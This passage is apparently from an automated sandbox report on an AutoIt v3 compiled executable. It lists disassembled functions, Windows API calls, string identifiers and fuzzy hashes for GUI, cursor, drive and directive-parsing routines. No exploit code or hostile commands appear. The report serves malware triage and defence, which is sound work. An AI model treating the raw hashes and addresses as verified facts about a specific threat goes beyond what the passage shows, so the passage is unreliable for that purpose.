              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
              • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
              • API String ID: 2910397461-517079104
              • Opcode ID: a2461272115318c352ec0180a715b7dcea1b53a8313f5e57a18f9a3db260d8a9
              • Instruction ID: 12c6b93ac837a9717c366fe467ffe6f98b2fbf6a10ce2ad3262625964a1ae901
              • Opcode Fuzzy Hash: a2461272115318c352ec0180a715b7dcea1b53a8313f5e57a18f9a3db260d8a9
              • Instruction Fuzzy Hash: 37A16F71A40209BFEB14DBA4ED4EFAABBA9EB45710F044114FA15A72E1C7B0AD00CF60
              Function 001EAF7B Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
              Download Yara Rule
              APIs
              • SetErrorMode.KERNEL32(00000001), ref: 001EAF89
              • GetDriveTypeW.KERNEL32(?,0020FAC0,?,\\.\,0020F910), ref: 001EB066
              • SetErrorMode.KERNEL32(00000000,0020FAC0,?,\\.\,0020F910), ref: 001EB1C4
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ErrorMode$DriveType
              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
              • API String ID: 2907320926-4222207086
              • Opcode ID: 656ff29a0c26bf42b0300bc1ccba9f38aa9d38343480adde299e45c67354ce3b
              • Instruction ID: 13fcf64b586688bd4bb7394c47f789da96c582de423cd96478876f2b421542f3
              • Opcode Fuzzy Hash: 656ff29a0c26bf42b0300bc1ccba9f38aa9d38343480adde299e45c67354ce3b
              • Instruction Fuzzy Hash: 0B51F670698B85EBCB08EB12D9D2C7FB3B0AB25751B284025F44AA7291C735AE51CB42
              Function 00186A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: __wcsnicmp
              • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
              • API String ID: 1038674560-86951937
              • Opcode ID: 7ba734dc515e7e27730559432206c70cfc103d8564aa71dee1fbddde1dbd0d82
              • Instruction ID: d37d356eed5c8cb8ee00fd4fabe42d5f5ddc6c6b0b3207b8f342a29165ced18f
              • Opcode Fuzzy Hash: 7ba734dc515e7e27730559432206c70cfc103d8564aa71dee1fbddde1dbd0d82
              • Instruction Fuzzy Hash: 708102B1740215BBCB25BA60CD83FEA77A8AF36704F044025F945AB1C6EB60DB55CBA1
              Function 0020AB60 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
              Download Yara Rule
              APIs
              • GetSysColor.USER32(00000012), ref: 0020AB99
              • SetTextColor.GDI32(?,?), ref: 0020AB9D
              • GetSysColorBrush.USER32(0000000F), ref: 0020ABB3
              • GetSysColor.USER32(0000000F), ref: 0020ABBE
              • CreateSolidBrush.GDI32(?), ref: 0020ABC3
              • GetSysColor.USER32(00000011), ref: 0020ABDB
              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0020ABE9
              • SelectObject.GDI32(?,00000000), ref: 0020ABFA
              • SetBkColor.GDI32(?,00000000), ref: 0020AC03
              • SelectObject.GDI32(?,?), ref: 0020AC10
              • InflateRect.USER32(?,000000FF,000000FF), ref: 0020AC2F
              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0020AC46
              • GetWindowLongW.USER32(00000000,000000F0), ref: 0020AC5B
              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0020ACA7
              • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0020ACCE
              • InflateRect.USER32(?,000000FD,000000FD), ref: 0020ACEC
              • DrawFocusRect.USER32(?,?), ref: 0020ACF7
              • GetSysColor.USER32(00000011), ref: 0020AD05
              • SetTextColor.GDI32(?,00000000), ref: 0020AD0D
              • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0020AD21
              • SelectObject.GDI32(?,0020A869), ref: 0020AD38
              • DeleteObject.GDI32(?), ref: 0020AD43
              • SelectObject.GDI32(?,?), ref: 0020AD49
              • DeleteObject.GDI32(?), ref: 0020AD4E
              • SetTextColor.GDI32(?,?), ref: 0020AD54
              • SetBkColor.GDI32(?,?), ref: 0020AD5E
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
              • String ID:
              • API String ID: 1996641542-0
              • Opcode ID: 8cc2ffe229b99519821f5031ab1bf2b9ae02883d60d4d1bc33f50eb9b041820d
              • Instruction ID: 5adf8dff507cda1407f628685adb70eebe9745868950eb5c3d275ad99cb26877
              • Opcode Fuzzy Hash: 8cc2ffe229b99519821f5031ab1bf2b9ae02883d60d4d1bc33f50eb9b041820d
              • Instruction Fuzzy Hash: E6617D71940318EFDB619FA4ED48EAEBB79FB08320F114125F915AB2E2D7719950CF90
              Function 00208C44 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
              Download Yara Rule
              APIs
              • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00208D34
              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00208D45
              • CharNextW.USER32(0000014E), ref: 00208D74
              • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00208DB5
              • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00208DCB
              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00208DDC
              • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00208DF9
              • SetWindowTextW.USER32(?,0000014E), ref: 00208E45
              • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00208E5B
              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00208E8C
              • _memset.LIBCMT ref: 00208EB1
              • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00208EFA
              • _memset.LIBCMT ref: 00208F59
              • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00208F83
              • SendMessageW.USER32(?,00001074,?,00000001), ref: 00208FDB
              • SendMessageW.USER32(?,0000133D,?,?), ref: 00209088
              • InvalidateRect.USER32(?,00000000,00000001), ref: 002090AA
              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 002090F4
              • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00209121
              • DrawMenuBar.USER32(?), ref: 00209130
              • SetWindowTextW.USER32(?,0000014E), ref: 00209158
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
              • String ID: 0
              • API String ID: 1073566785-4108050209
              • Opcode ID: d85d865616691a75cc8020e6ba9bca42507cf280bc871170836a499e12d5430f
              • Instruction ID: 8faffdbfde487dbc3e6f8a52ede101f957e720e2ab259d90fb71c86614f78043
              • Opcode Fuzzy Hash: d85d865616691a75cc8020e6ba9bca42507cf280bc871170836a499e12d5430f
              • Instruction Fuzzy Hash: B2E1B37491030AABDF209F60DC88EEFBB79EF05710F108156F9699A1D2DB718A91DF60
              Function 00204B16 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
              Download Yara Rule
              APIs
              • GetCursorPos.USER32(?), ref: 00204C51
              • GetDesktopWindow.USER32 ref: 00204C66
              • GetWindowRect.USER32(00000000), ref: 00204C6D
              • GetWindowLongW.USER32(?,000000F0), ref: 00204CCF
              • DestroyWindow.USER32(?), ref: 00204CFB
              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00204D24
              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00204D42
              • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00204D68
              • SendMessageW.USER32(?,00000421,?,?), ref: 00204D7D
              • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00204D90
              • IsWindowVisible.USER32(?), ref: 00204DB0
              • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00204DCB
              • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00204DDF
              • GetWindowRect.USER32(?,?), ref: 00204DF7
              • MonitorFromPoint.USER32(?,?,00000002), ref: 00204E1D
              • GetMonitorInfoW.USER32(00000000,?), ref: 00204E37
              • CopyRect.USER32(?,?), ref: 00204E4E
              • SendMessageW.USER32(?,00000412,00000000), ref: 00204EB9
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
              • String ID: ($0$tooltips_class32
              • API String ID: 698492251-4156429822
              • Opcode ID: 33195a47ad3f3986d79925591362db5c824e116aec76ef26b52bce9c6d134413
              • Instruction ID: ada9d4ab7c487a12ad7f530c75a5a828eeb6ee18ec3d951e29605558bd95f47c
              • Opcode Fuzzy Hash: 33195a47ad3f3986d79925591362db5c824e116aec76ef26b52bce9c6d134413
              • Instruction Fuzzy Hash: B5B19DB0614341AFDB44EF64C948B6ABBE4FF84304F008A1DF6999B2A2C771ED15CB51
              Function 001E46D6 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
              Download Yara Rule
              APIs
              • GetFileVersionInfoSizeW.VERSION(?,?), ref: 001E46E8
              • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 001E470E
              • _wcscpy.LIBCMT ref: 001E473C
              • _wcscmp.LIBCMT ref: 001E4747
              • _wcscat.LIBCMT ref: 001E475D
              • _wcsstr.LIBCMT ref: 001E4768
              • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 001E4784
              • _wcscat.LIBCMT ref: 001E47CD
              • _wcscat.LIBCMT ref: 001E47D4
              • _wcsncpy.LIBCMT ref: 001E47FF
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
              • API String ID: 699586101-1459072770
              • Opcode ID: 49ffaa5601d0817cdb9887300094384b882252e780b134d07c3af4643ec9ef32
              • Instruction ID: c2088d98cbb75667644c0d1b84ade40707803cca8ccd335402da513c007a16d1
              • Opcode Fuzzy Hash: 49ffaa5601d0817cdb9887300094384b882252e780b134d07c3af4643ec9ef32
              • Instruction Fuzzy Hash: E541277AA00340BBEB25AB759D47EBF77ACDF57710F00006AF904E6182EB70DA1196A5
              Function 001827D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
              Download Yara Rule
              APIs
              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 001828BC
              • GetSystemMetrics.USER32(00000007), ref: 001828C4
              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 001828EF
              • GetSystemMetrics.USER32(00000008), ref: 001828F7
              • GetSystemMetrics.USER32(00000004), ref: 0018291C
              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00182939
              • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00182949
              • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0018297C
              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00182990
              • GetClientRect.USER32(00000000,000000FF), ref: 001829AE
              • GetStockObject.GDI32(00000011), ref: 001829CA
              • SendMessageW.USER32(00000000,00000030,00000000), ref: 001829D5
                • Part of subcall function 00182344: GetCursorPos.USER32(?), ref: 00182357
                • Part of subcall function 00182344: ScreenToClient.USER32(002467B0,?), ref: 00182374
                • Part of subcall function 00182344: GetAsyncKeyState.USER32(00000001), ref: 00182399
                • Part of subcall function 00182344: GetAsyncKeyState.USER32(00000002), ref: 001823A7
              • SetTimer.USER32(00000000,00000000,00000028,00181256), ref: 001829FC
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
              • String ID: AutoIt v3 GUI
              • API String ID: 1458621304-248962490
              • Opcode ID: a8ccea4b3567cd469b846c1e847d09edd962ed4a7c008dc6ba48c1f8d25b0cc7
              • Instruction ID: 50ea0ff2269ecb7be09c3600be771542394a97cc2256dd8ceef556fe0bd61bb5
              • Opcode Fuzzy Hash: a8ccea4b3567cd469b846c1e847d09edd962ed4a7c008dc6ba48c1f8d25b0cc7
              • Instruction Fuzzy Hash: E7B19F75A4020AEFDB25EFA8DD89BED7BB4FB09714F104129FA15A72A0CB709940CF51
              Function 00204069 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON
              Download Yara Rule
              APIs
              • CharUpperBuffW.USER32(?,?), ref: 002040F6
              • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 002041B6
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: BuffCharMessageSendUpper
              • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
              • API String ID: 3974292440-719923060
              • Opcode ID: 4632cbfc821c8bdf296d26749ac56022ce33409d7928b3d552e2cb3ebcea323b
              • Instruction ID: fe06716a6f123467164af0d34329f3d5a37aa6089ef7e57b00a440cb53275a82
              • Opcode Fuzzy Hash: 4632cbfc821c8bdf296d26749ac56022ce33409d7928b3d552e2cb3ebcea323b
              • Instruction Fuzzy Hash: 5EA1AFB02243029FCB14FF60C981A7AB3A5AF98314F14896DB9969B7D3DB30ED15CB41
              Function 001F52F0 Relevance: 27.1, APIs: 18, Instructions: 124COMMON
              Download Yara Rule
              APIs
              • LoadCursorW.USER32(00000000,00007F89), ref: 001F5309
              • LoadCursorW.USER32(00000000,00007F8A), ref: 001F5314
              • LoadCursorW.USER32(00000000,00007F00), ref: 001F531F
              • LoadCursorW.USER32(00000000,00007F03), ref: 001F532A
              • LoadCursorW.USER32(00000000,00007F8B), ref: 001F5335
              • LoadCursorW.USER32(00000000,00007F01), ref: 001F5340
              • LoadCursorW.USER32(00000000,00007F81), ref: 001F534B
              • LoadCursorW.USER32(00000000,00007F88), ref: 001F5356
              • LoadCursorW.USER32(00000000,00007F80), ref: 001F5361
              • LoadCursorW.USER32(00000000,00007F86), ref: 001F536C
              • LoadCursorW.USER32(00000000,00007F83), ref: 001F5377
              • LoadCursorW.USER32(00000000,00007F85), ref: 001F5382
              • LoadCursorW.USER32(00000000,00007F82), ref: 001F538D
              • LoadCursorW.USER32(00000000,00007F84), ref: 001F5398
              • LoadCursorW.USER32(00000000,00007F04), ref: 001F53A3
              • LoadCursorW.USER32(00000000,00007F02), ref: 001F53AE
              • GetCursorInfo.USER32(?), ref: 001F53BE
              • GetLastError.KERNEL32(00000001,00000000), ref: 001F53E9
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Cursor$Load$ErrorInfoLast
              • String ID:
              • API String ID: 3215588206-0
              • Opcode ID: c6fb70f55347a3e37506435338a3ae783a36934578e957c2f56e482fb5b84170
              • Instruction ID: 60a028716db3228008cb708a490db346db7e3aebcd43bead4ee1422c2586feca
              • Opcode Fuzzy Hash: c6fb70f55347a3e37506435338a3ae783a36934578e957c2f56e482fb5b84170
              • Instruction Fuzzy Hash: 88418470E043196ADB109FBA8C4986FFFF8EF51B50B10452FE609E7291DBB8A501CE91
              Function 001DAA64 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
              Download Yara Rule
              APIs
              • GetClassNameW.USER32(?,?,00000100), ref: 001DAAA5
              • __swprintf.LIBCMT ref: 001DAB46
              • _wcscmp.LIBCMT ref: 001DAB59
              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 001DABAE
              • _wcscmp.LIBCMT ref: 001DABEA
              • GetClassNameW.USER32(?,?,00000400), ref: 001DAC21
              • GetDlgCtrlID.USER32(?), ref: 001DAC73
              • GetWindowRect.USER32(?,?), ref: 001DACA9
              • GetParent.USER32(?), ref: 001DACC7
              • ScreenToClient.USER32(00000000), ref: 001DACCE
              • GetClassNameW.USER32(?,?,00000100), ref: 001DAD48
              • _wcscmp.LIBCMT ref: 001DAD5C
              • GetWindowTextW.USER32(?,?,00000400), ref: 001DAD82
              • _wcscmp.LIBCMT ref: 001DAD96
                • Part of subcall function 001A386C: _iswctype.LIBCMT ref: 001A3874
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
              • String ID: %s%u
              • API String ID: 3744389584-679674701
              • Opcode ID: 5fd21e1ff810d7bea242e37997164b5220f8bd6c02c23edac2915a62ee984324
              • Instruction ID: 264ce548182251becdd2a6f5fa0099a0c5b9231d55c5408bffe8e0c5a4e8d165
              • Opcode Fuzzy Hash: 5fd21e1ff810d7bea242e37997164b5220f8bd6c02c23edac2915a62ee984324
              • Instruction Fuzzy Hash: A7A1D271204706AFDB14DF64C884BAAF7E9FF04315F50462AF9A9C3691DB30EA45CB92
              Function 001DB397 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
              Download Yara Rule
              APIs
              • GetClassNameW.USER32(00000008,?,00000400), ref: 001DB3DB
              • _wcscmp.LIBCMT ref: 001DB3EC
              • GetWindowTextW.USER32(00000001,?,00000400), ref: 001DB414
              • CharUpperBuffW.USER32(?,00000000), ref: 001DB431
              • _wcscmp.LIBCMT ref: 001DB44F
              • _wcsstr.LIBCMT ref: 001DB460
              • GetClassNameW.USER32(00000018,?,00000400), ref: 001DB498
              • _wcscmp.LIBCMT ref: 001DB4A8
              • GetWindowTextW.USER32(00000002,?,00000400), ref: 001DB4CF
              • GetClassNameW.USER32(00000018,?,00000400), ref: 001DB518
              • _wcscmp.LIBCMT ref: 001DB528
              • GetClassNameW.USER32(00000010,?,00000400), ref: 001DB550
              • GetWindowRect.USER32(00000004,?), ref: 001DB5B9
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
              • String ID: @$ThumbnailClass
              • API String ID: 1788623398-1539354611
              • Opcode ID: f0ac50d6bf125170de50f40290394d627d8309a813a1ef83843fb0e4ec3956f3
              • Instruction ID: 169e4fbfba334cbb8c3e163cf709c664e5bfed473b6a10dbe9cf5012ac245930
              • Opcode Fuzzy Hash: f0ac50d6bf125170de50f40290394d627d8309a813a1ef83843fb0e4ec3956f3
              • Instruction Fuzzy Hash: A481BE71008305DBDB15DF10D8C5FAABBE8EF54714F08856AFD868A2A2DB34EE45CB61
              Function 0020C8EE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00182612: GetWindowLongW.USER32(?,000000EB), ref: 00182623
              • DragQueryPoint.SHELL32(?,?), ref: 0020C917
                • Part of subcall function 0020ADF1: ClientToScreen.USER32(?,?), ref: 0020AE1A
                • Part of subcall function 0020ADF1: GetWindowRect.USER32(?,?), ref: 0020AE90
                • Part of subcall function 0020ADF1: PtInRect.USER32(?,?,0020C304), ref: 0020AEA0
              • SendMessageW.USER32(?,000000B0,?,?), ref: 0020C980
              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0020C98B
              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0020C9AE
              • _wcscat.LIBCMT ref: 0020C9DE
              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0020C9F5
              • SendMessageW.USER32(?,000000B0,?,?), ref: 0020CA0E
              • SendMessageW.USER32(?,000000B1,?,?), ref: 0020CA25
              • SendMessageW.USER32(?,000000B1,?,?), ref: 0020CA47
              • DragFinish.SHELL32(?), ref: 0020CA4E
              • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0020CB41
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
